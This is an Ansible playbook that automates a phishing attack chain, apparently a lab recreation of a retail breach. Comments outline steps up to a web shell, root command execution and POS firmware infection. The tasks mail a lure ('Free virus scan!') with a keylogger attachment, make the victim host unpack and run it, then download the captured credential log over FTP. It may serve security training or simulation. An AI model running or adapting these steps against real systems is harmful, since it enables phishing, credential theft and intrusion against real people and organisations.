---
#
# phishing inject
# 1. send phishing email
# 2. download malicious software
# 3. get contractor's account and password
# 4. login Target webserver as contractor
# 5. upload shell file to implement command injection 
# 6. run system command as root on web server
# -----------------------------------------------
# 7. inject malicious software on posfirmware
# 8. get credentials



- name: phishing inject
  hosts: blackhat
  tasks:
    - name: send a phishing email
      raw: echo "Are you frustrated with how slow your computer is? Open the attachment for a free virus scan!" | mutt -s "Free virus scan!" -a keylogger.py -- contractor@fazio.com
- name: phishing response
  hosts: contractor
  tasks:
    - name: download the email
      raw: fetchmail
    - name: isolate the email in home directory
      raw: grep -lir "keylogger" /home/ubuntu/mail/new | xargs -I {} mv {} /home/ubuntu
    - name: unpack the attachment
      raw: grep -lir "keylogger" /home/ubuntu | xargs munpack
    - name: run the keylogger
      raw: python keylogger.py
- name: recover captured credentials
  hosts: blackhat
  tasks:
    - name: download log file from ftp
      raw: wget --user=anonymous --password='contractor@fazio.com' ftp://ftp.fazio.com:21/upload/logs.txt